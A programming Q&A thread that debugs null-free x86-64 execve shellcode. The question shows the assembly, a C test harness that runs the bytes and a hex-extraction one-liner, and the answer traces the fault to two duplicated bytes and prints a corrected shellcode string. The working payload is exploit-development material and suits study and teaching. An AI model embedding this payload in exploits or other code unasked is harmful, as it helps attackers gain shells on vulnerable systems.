Search code examples
linuxgccassemblyx86-64shellcode

JMP unexpected behavior in Shellcode when next(skipped) instruction is a variable definition


Purpose: I was trying to take advantage of the RIP mode in x86-64. Even though the assembly performs as expected on its own, the shellcode does not.

The Problem: Concisely what I tried was this,

jmp l1
str1: db "some string"
l1:
   other code
   lea rax, [rel str1]

I used the above at various places, it failed only at certain places and succeeded in other places. I tried to play around and could not find any pattern when it fails. When variable(str1: db instruction) position is after the instruction accessing it, it never failed(in my observations). However, I want to remove nulls, hence I placed the variable definition before accessing it.

Debug finds
On debugging , I found the failed jmp point to some incorrect instruction address. Eg:(in gdb)

(code + 18) jmp [code +27] //jmp pointing incorrectly to in-between 2
(code + 22) ... (this part has label)
(code + 24) some instruction // this is where I intended the jmp
(code + 28) some other instruction

Code This is a sample code, I was trying to spawn a Execve Shell. It is quite large so I have identified the position of the culprit JMP.

global _start
section .text
_start: 
    xor rax,rax
    mov rsi,rax
    mov rdi,rsi
    mov rdx,rdi
    mov r8,rdx
    mov rcx,r8
    mov rbx,rcx
    jmp gg //failing (jumping somewhere unintended)
    p2: db "/bin/sh"        
gg:
    xor rax,rax
    lea rdi, [rel p2]
    mov [rdi+7], byte al //null terminating using 0x00 from rax
    mov [rdi+8], rdi
    mov [rdi+16],rax


    lea rsi,[rdi+8]
    lea rdx,[rdi+16]
    mov al,59
    syscall

EDIT:1 Have modified the code to contain the failing instructions

EDIT:2 Shellcode in C that I used.

#include<stdio.h>
#include<string.h>

unsigned char code[] = \
"\x48\x31\xc0\x48\x89\xc6\x48\x89\xf7\x48\x89\xfa\x49\x89\xd0\x4c\x89\xc1\x48\x89\xcb\xeb\x07\x2f\x62\x69\x6e\x2f\x73\x68\x48\x31\x48\x31\xc0\x48\x8d\x3d\xef\xff\xff\xff\x88\x47\x07\x48\x89\x7f\x08\x48\x89\x47\x10\x48\x8d\x77\x08\x48\x8d\x57\x10\xb0\x3b\x0f\x05";
main()
{

    printf("Shellcode Length:  %d\n", (int)strlen(code));

    int (*ret)() = (int(*)())code;

    ret();

}

EDIT 3 I would get Hexdump by placing the following code would be placed inside a Bash file and running it by passing filename as argument. Took it from ShellStorm.

`for i in $(objdump -d $1 -M intel |grep "^ " |cut -f2); do echo -n '\x'$i`;

Solution

  • TL;DR : The method you are using to convert your standalone shell code program shellExec to a shell code exploit string is buggy.


    Based on the information given, I suspect the problem is the way in which you are using disassembly output to generate the final byte stream that gets converted into your shell code string. Likely the disassembly output had confusing output and possibly duplicated values. While trying to disassemble data (mixed with the code) it tried to output the shortest encodeable instruction to finish consuming all the data and then discovered you had a JMP target and duplicated some of the bytes as it backed up to re-synchronize. Whatever process was used to convert the disassembly to binary didn't take this kind of issue into account.

    Don't use disassembly output to generate the binary file. Generate your standalone executable with the shell code (I believe shellExec is the file in your case) and use tools like OBJCOPY and HEXDUMP to generate the C shell code string:

    objcopy -j.text -O binary execShell execShell.bin
    hexdump -v -e '"\\""x" 1/1 "%02x" ""' execShell.bin
    

    The objcopy command takes the execShell executable and extracts just the .text section (using the -j.text option) and outputs as binary data to the file execShell.bin. The hexdump command just reformats the binary file and outputs it in a form that can be used in a C string. This process doesn't involve parsing any confusing disassembly output so doesn't suffer the problem you encountered. The output of hexdump should look like:

    \x48\x31\xc0\x48\x89\xc6\x48\x89\xf7\x48\x89\xfa\x49\x89\xd0\x4c\x89\xc1\x48\x89\xcb\xeb\x07\x2f\x62\x69\x6e\x2f\x73\x68\x48\x31\xc0\x48\x8d\x3d\xef\xff\xff\xff\x88\x47\x07\x48\x89\x7f\x08\x48\x89\x47\x10\x48\x8d\x77\x08\x48\x8d\x57\x10\xb0\x3b\x0f\x05

    This differs slightly from yours which was:

    \x48\x31\xc0\x48\x89\xc6\x48\x89\xf7\x48\x89\xfa\x49\x89\xd0\x4c\x89\xc1\x48\x89\xcb\xeb\x07\x2f\x62\x69\x6e\x2f\x73\x68\x48\x31\x48\x31\xc0\x48\x8d\x3d\xef\xff\xff\xff\x88\x47\x07\x48\x89\x7f\x08\x48\x89\x47\x10\x48\x8d\x77\x08\x48\x8d\x57\x10\xb0\x3b\x0f\x05

    I've highlighted the difference. After the string of bytes /bin/sh your output introduced an extra \x48\x31 . The extra 2 bytes in your shell code string are responsible for the code not running as expected in the target executable.